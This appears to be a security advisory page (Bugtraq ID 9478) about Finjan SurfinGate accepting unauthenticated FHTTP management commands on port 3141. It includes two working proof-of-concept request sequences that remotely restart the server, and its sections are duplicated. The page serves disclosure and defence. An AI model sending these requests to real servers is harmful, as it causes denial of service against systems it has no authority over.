Finjan SurfinGate FHTTP Restart Command Execution Vulnerability
BID:9478
Info
Finjan SurfinGate FHTTP Restart Command Execution Vulnerability
| Bugtraq ID: | 9478 |
| Class: | Access Validation Error |
| CVE: |
CVE-2004-2107 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 23 2004 12:00AM |
| Updated: | Jul 12 2009 02:06AM |
| Credit: | Discovery of this issue is credited to David Byrne. |
| Vulnerable: |
Finjan Software SurfinGate 7.0 Finjan Software SurfinGate 6.0 5 Finjan Software SurfinGate 6.0 1 Finjan Software SurfinGate 6.0 |
| Not Vulnerable: | |
Discussion
Finjan SurfinGate FHTTP Restart Command Execution Vulnerability
Finjan SurfinGate is prone to a vulnerability that may permit remote attackers to execute certain management commands (using the FHTTP protocol) through the management control port (3141/TCP). It has been reported that commands could be issued to restart the server, most likely resulting in a denial of service.
Finjan SurfinGate is prone to a vulnerability that may permit remote attackers to execute certain management commands (using the FHTTP protocol) through the management control port (3141/TCP). It has been reported that commands could be issued to restart the server, most likely resulting in a denial of service.
Exploit / POC
Finjan SurfinGate FHTTP Restart Command Execution Vulnerability
The following example requests were provided:
Example 1:
>>> CONNECT LOCALHOST:3141 HTTP/1.0
>>>
<<< HTTP/1.0 200 Connection established
<<< Proxy-agent: Finjan-SurfinGate/6.0
<<<
>>> FINJAN /stam HTTP/1.0
>>> finjan-version: fhttp/1.0
>>> finjan-command: custom
>>> finjan-parameter-category: console
>>> finjan-parameter-type: restart
>>> content-length: 0
>>>
<<< HTTP/1.0 200 OK
<<< finjan-version: fhttp/1.0
<<<
<<<
Example 2:
>>> FINJAN localhost:3141/stam HTTP/1.0
>>> finjan-version: fhttp/1.0
>>> finjan-command: custom
>>> finjan-parameter-category: console
>>> finjan-parameter-type: restart
>>> content-length: 0
>>>
<<< HTTP/1.0 200 OK
<<< finjan-version: fhttp/1.0
<<<
<<<
The following example requests were provided:
Example 1:
>>> CONNECT LOCALHOST:3141 HTTP/1.0
>>>
<<< HTTP/1.0 200 Connection established
<<< Proxy-agent: Finjan-SurfinGate/6.0
<<<
>>> FINJAN /stam HTTP/1.0
>>> finjan-version: fhttp/1.0
>>> finjan-command: custom
>>> finjan-parameter-category: console
>>> finjan-parameter-type: restart
>>> content-length: 0
>>>
<<< HTTP/1.0 200 OK
<<< finjan-version: fhttp/1.0
<<<
<<<
Example 2:
>>> FINJAN localhost:3141/stam HTTP/1.0
>>> finjan-version: fhttp/1.0
>>> finjan-command: custom
>>> finjan-parameter-category: console
>>> finjan-parameter-type: restart
>>> content-length: 0
>>>
<<< HTTP/1.0 200 OK
<<< finjan-version: fhttp/1.0
<<<
<<<
Solution / Fix
Finjan SurfinGate FHTTP Restart Command Execution Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Finjan SurfinGate FHTTP Restart Command Execution Vulnerability
References:
References:
- SurfinGate Product Page (Finjan Software)
- Finjan SurfinGate Vulnerability (David Byrne
) - RE: Finjan SurfinGate Vulnerability ("Menashe Eliezer"
)